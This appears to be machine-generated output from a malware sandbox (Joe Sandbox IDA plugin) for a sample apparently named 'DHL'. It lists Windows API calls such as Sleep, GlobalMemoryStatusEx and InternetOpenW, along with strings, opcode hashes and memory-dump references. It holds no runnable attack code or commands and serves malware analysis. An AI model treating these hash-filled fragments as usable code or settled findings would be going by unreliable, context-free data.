                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: 96bda0bb87add24831af561b687bfd85ca7f8d54042b68246ee55e33543c127b
                                                        • Instruction ID: 488a04d7b0ef8bf1fff289ee21884279b62b5587b6a8d81a58f77061dbbd2b30
                                                        • Opcode Fuzzy Hash: 96bda0bb87add24831af561b687bfd85ca7f8d54042b68246ee55e33543c127b
                                                        • Instruction Fuzzy Hash: 1B513A65E4C20296CB15B794C901B79BB9C9B80740F70CD5EE097423F9FB398C969A47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        • Opcode ID: 13741c53d11776e3223d2e13976ccf10bcaf9720cd5592046663e0c6d38bbb94
                                                        • Instruction ID: 25efd1807bac005141d436ae728eaf122d7bb51996439fa8e18d69908fddcec5
                                                        • Opcode Fuzzy Hash: 13741c53d11776e3223d2e13976ccf10bcaf9720cd5592046663e0c6d38bbb94
                                                        • Instruction Fuzzy Hash: 8851277550424ADFDB15EF68C4816FA7BACEF55320F244069FDA19B2E0D7349D42CB90
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 009BF2A2
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 009BF2BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: fbde3a83cc7d6a6eb049fc4a50d390edef7105d894e2c132730b17035497ce3c
                                                        • Instruction ID: b80bd1aee69e15244750c029d73838e35d9e856ff2131b1fe1cfde79fa05f3b7
                                                        • Opcode Fuzzy Hash: fbde3a83cc7d6a6eb049fc4a50d390edef7105d894e2c132730b17035497ce3c
                                                        • Instruction Fuzzy Hash: B85123724087449BD320EF90DC86BABBBF8FBC5300F81885DF199411A5EB708529CBA6
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00A257E0
                                                        • _wcslen.LIBCMT ref: 00A257EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper_wcslen
                                                        • String ID: CALLARGARRAY
                                                        • API String ID: 157775604-1150593374
                                                        • Opcode ID: 3e5792e70f1b7ed3661c1ad223720d3d409f99526a65cf3ac16f32cd82144f86
                                                        • Instruction ID: a104c5902993ff5fc13d7db1f9e575f78fea4de9e7f7a1b1b64a8700297f9451
                                                        • Opcode Fuzzy Hash: 3e5792e70f1b7ed3661c1ad223720d3d409f99526a65cf3ac16f32cd82144f86
                                                        • Instruction Fuzzy Hash: DE418C31E002199FCB04DFB8D9819AEBBB5FF99324F104029E505AB291E7749D81DBA0
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00A1D130
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A1D13A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_wcslen
                                                        • String ID: |
                                                        • API String ID: 596671847-2343686810
                                                        • Opcode ID: 34d388e1395a695c44cc224f6ff36ee341ffde5352bd43657828624880f8faa9
                                                        • Instruction ID: b7e5bb55a4103953d2d819c7ed762d1f385eca872884e36c72e4e451c45178a3
                                                        • Opcode Fuzzy Hash: 34d388e1395a695c44cc224f6ff36ee341ffde5352bd43657828624880f8faa9
                                                        • Instruction Fuzzy Hash: CD312C71D00219ABCF15EFA4CC85AEEBFB9FF46340F100119F815A6161E735AA56CBA0
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00A33621
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A3365C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 63d26131754678ce826303457c1854080d88fe1f0d07524202d890b73ace21d0
                                                        • Instruction ID: 3e5e987132a07192a9297b672b3bf816ddf884608968a1cdfe40690ec4363c6f
                                                        • Opcode Fuzzy Hash: 63d26131754678ce826303457c1854080d88fe1f0d07524202d890b73ace21d0
                                                        • Instruction Fuzzy Hash: 85318A72110204AEDB20DF68DC81ABB73A9FF88720F009619F8A5D7290DB34AD91C760
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A3461F
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A34634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 250d6b12dc82b2501be352592b07f85176751ee94e30ad84159c49ed36936ea9
                                                        • Instruction ID: 2384c2a73b4d2205a045e5f188d8578e789ebc88c6c89e1fd4b366492fe12dfc
                                                        • Opcode Fuzzy Hash: 250d6b12dc82b2501be352592b07f85176751ee94e30ad84159c49ed36936ea9
                                                        • Instruction Fuzzy Hash: E531F675E0130A9FDB14CFA9C991BDABBB5FF49300F14406AE905AB391E770A942CF90
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009E33A2
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 009A3A04
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                        • String ID: Line:
                                                        • API String ID: 2289894680-1585850449
                                                        • Opcode ID: 5c991897e0c9b630ded9f5716dbf5dafeab8353cb8067c34044cf945fa436310
                                                        • Instruction ID: 49e6f69a71bb4c99fcaeca7c076f9311a28fb8d4e056423dc93294c44a1521d4
                                                        • Opcode Fuzzy Hash: 5c991897e0c9b630ded9f5716dbf5dafeab8353cb8067c34044cf945fa436310
                                                        • Instruction Fuzzy Hash: 8131CF71408300AED721EB64DC46FEBB7ECAB82710F00892AF59997191EF749A49C7D2
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A3327C
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A33287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 22fb5defa2770195392bf05b30ef435df8cc673d850e1c3c656fb7475d5db51c
                                                        • Instruction ID: c47fa2ff6280094f214adc997dea12446cf76f89dc2bd8add97355ab712ce3fa
                                                        • Opcode Fuzzy Hash: 22fb5defa2770195392bf05b30ef435df8cc673d850e1c3c656fb7475d5db51c
                                                        • Instruction Fuzzy Hash: 6911B2723042087FEF219F94DC81EFB376AEBA4364F104228F91897290D6759D518760
                                                        APIs
                                                          • Part of subcall function 009A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009A604C
                                                          • Part of subcall function 009A600E: GetStockObject.GDI32(00000011), ref: 009A6060
                                                          • Part of subcall function 009A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009A606A
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A3377A
                                                        • GetSysColor.USER32(00000012), ref: 00A33794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 3003477b6ad8755bce8a89a4ad339d8826d36f1cdb784af2312fa5f4018785d1
                                                        • Instruction ID: 39c8064547577dcc868bc20225281ffa12434062e6aa682204e4fe6083cd097f
                                                        • Opcode Fuzzy Hash: 3003477b6ad8755bce8a89a4ad339d8826d36f1cdb784af2312fa5f4018785d1
                                                        • Instruction Fuzzy Hash: 8A1126B2610209AFDF00DFA8CC46AFA7BB8FB08314F004915F956E2250E735E8619B60
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A1CD7D
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A1CDA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 9a4f2d6bb173b8c25598ad2353c54581c9362af1ee6a5a939d9d1eb2b2b93c57
                                                        • Instruction ID: 3b42440c5410ce552d9f6ecb514cd9dd510dd036df3b014dafc38f43400fad8c
                                                        • Opcode Fuzzy Hash: 9a4f2d6bb173b8c25598ad2353c54581c9362af1ee6a5a939d9d1eb2b2b93c57
                                                        • Instruction Fuzzy Hash: FE11C2B1285631BAD7384B66AC49EE7BEACEF127B4F00422AB54993080D7749981D6F0
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00A334AB
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A334BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: f3abb889064e7e0e9a9711cd554e2f9dd7d6af8127b1d8be2da25b8dd5875303
                                                        • Instruction ID: 809ed6003468ebb3bb883710c9bd07a65709ecc22c1e5748a21ba9fc26a87973
                                                        • Opcode Fuzzy Hash: f3abb889064e7e0e9a9711cd554e2f9dd7d6af8127b1d8be2da25b8dd5875303
                                                        • Instruction Fuzzy Hash: 29118C72104208ABEF228FA4DC85ABB37AAEB05775F504724F965A31E0C775DC919B60
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00A06CB6
                                                        • _wcslen.LIBCMT ref: 00A06CC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: STOP
                                                        • API String ID: 1256254125-2411985666
                                                        • Opcode ID: 5d2a2941342395a51e2e4fa4571b36f2ad75248f0d2b76b96020100f30c33fe4
                                                        • Instruction ID: 3fdb008257f7d697029e6b65802f50aee82800f1630eed0fc864fbc86507a79d
                                                        • Opcode Fuzzy Hash: 5d2a2941342395a51e2e4fa4571b36f2ad75248f0d2b76b96020100f30c33fe4
                                                        • Instruction Fuzzy Hash: B101D632A0092A8BDB219FFDEC91ABF77B5FBA57187100529E852971D0EB31D960C690
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A03CCA
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A01D4C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: f0b2d1cba6c8a3f888ec866e4ab2d910fdcca5ee5a7b3908d6fa0476a27b7a5a
                                                        • Instruction ID: 39fc679fa66aca5bf8641f7a3f5c4929e5e82975cbd20c01a4c11487c309f367
                                                        • Opcode Fuzzy Hash: f0b2d1cba6c8a3f888ec866e4ab2d910fdcca5ee5a7b3908d6fa0476a27b7a5a
                                                        • Instruction Fuzzy Hash: 2001D471A0122CABCF08EBA4DD55DFE73B8FB47360B044A19F872672C1EA34590887A0
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A03CCA
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A01C46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: da5960a6f3a691cee2351791971963654b918a56a5ab40f2f5eee7152a17e31c
                                                        • Instruction ID: c956f6855cd5bc49e62afecb2a7636cee3ad3ad13f7c23e6ed91ed2a6f862ac2
                                                        • Opcode Fuzzy Hash: da5960a6f3a691cee2351791971963654b918a56a5ab40f2f5eee7152a17e31c
                                                        • Instruction Fuzzy Hash: 7301A775A8110C67DF08EBA0DE56AFF77B8AB52340F140019F416772C1EA24DE4C86B1
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A03CCA
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A01CC8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: 337aef643935fd4b22d6627ac53a9f96eb6849e43ef66069999078f71aa738e4
                                                        • Instruction ID: 37442ec40085f1f5e0a2a693d7587f03679ea828e1676a9684569f6a962b4fec
                                                        • Opcode Fuzzy Hash: 337aef643935fd4b22d6627ac53a9f96eb6849e43ef66069999078f71aa738e4
                                                        • Instruction Fuzzy Hash: 3601D671A8011C67EF04EBA4DF16AFE73BCAB12380F140415B806B32C1EA24DF19C6B1
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A03CCA
                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00A01DD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: 16c6fbbf090ea223888c9d26b25335003f8d3e5a7062266b3f43b26ff83673e4
                                                        • Instruction ID: 14f42d660c27e28ed3d146b6f1feb27893584e19502d611ec0be1e1e05d9ad27
                                                        • Opcode Fuzzy Hash: 16c6fbbf090ea223888c9d26b25335003f8d3e5a7062266b3f43b26ff83673e4
                                                        • Instruction Fuzzy Hash: ABF0AF71A4162866DB04E7A4DD56BFE77BCBB42390F040D19F866A72C1EA645A0882A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: 3, 3, 16, 1
                                                        • API String ID: 176396367-3042988571
                                                        • Opcode ID: 4df70f7bafff8832b4edcecbee92ba26067814e17835fa9192afc539637776e7
                                                        • Instruction ID: c2c42f494202c6a5ab03e090a5ad24dc8c9872dfc1ef36adfa5be1fdefcbc609
                                                        • Opcode Fuzzy Hash: 4df70f7bafff8832b4edcecbee92ba26067814e17835fa9192afc539637776e7
                                                        • Instruction Fuzzy Hash: DEE02B02B14230209231337DBDC1FBF568ADFC5B90710183FF981C6266EAA48E9193A2
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A00B23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
